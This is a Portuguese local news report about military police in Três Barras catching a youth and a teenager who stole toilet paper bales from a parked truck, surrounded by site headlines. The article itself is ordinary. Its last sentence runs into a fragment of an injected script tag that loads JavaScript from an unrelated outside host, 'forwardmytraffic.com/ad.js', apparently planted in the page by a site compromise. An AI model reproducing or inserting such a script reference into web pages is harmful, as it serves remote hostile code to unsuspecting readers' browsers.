InícioDestaquePM DE TRÊS BARRAS Captura Ladrões de Papel Higiênico

PM DE TRÊS BARRAS Captura Ladrões de Papel Higiênico

Últimas notícias

Pé-de-Meia: estudantes nascidos em março e abril recebem hoje R$ 200

Estudantes do ensino médio da rede pública nascidos março...

Homem com mandado de prisão ativo é capturado no centro de Canoinhas

Na terça-feira, 26, policiais militares receberam informações de um...

Mulher é conduzida a delegacia por utilizar “Gato” em rede de energia

Na terça-feira, 26, por volta das 10h40, policiais militares...

No domingo, 10, por volta das 14h45, equipes da PM de Três Barras foram acionadas via Copom 190 para deslocar na Avenida Abraão Mussi, bairro São Cristovão no município de Três Barras para atendimento de ocorrência de furto.

 

 

Chegando ao local a equipe PM conversou com o solicitante, o qual relatou que no sábado estava na casa de um amigo em uma janta, que deixou seu caminhão carregado de papel higiênico, na Avenida Abraão Mussi, próximo a Lavação Vilcar. Que no domingo, seu amigo ligou contando que estavam vendendo papel higiênico nas proximidades do endereço em que o caminhão ficou estacionado, com isto foi verificar a carga, sendo que estava violado, lacre rompido e cadeado arrombado, sendo que foram furtados 15 fardos de papel higiênico totalizando 60 pacotes.

 

 

No local foi conversado com os vizinhos, sendo que uma senhora relatou que às 07hs da manhã seus vizinhos tentaram vender um pacote de papel higiênico, mas que ela não tinha dinheiro para comprar, então ganhou o pacote de papel higiênico, outras pessoas também relataram que havia papel higiênico no pátio de suas residências.

 

 

Diante dos fatos a equipe PM identificou os envolvidos sendo um jovem e um adolescente que foram apreendidos e conduzidos para Delegacia de Polícia para providencias…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.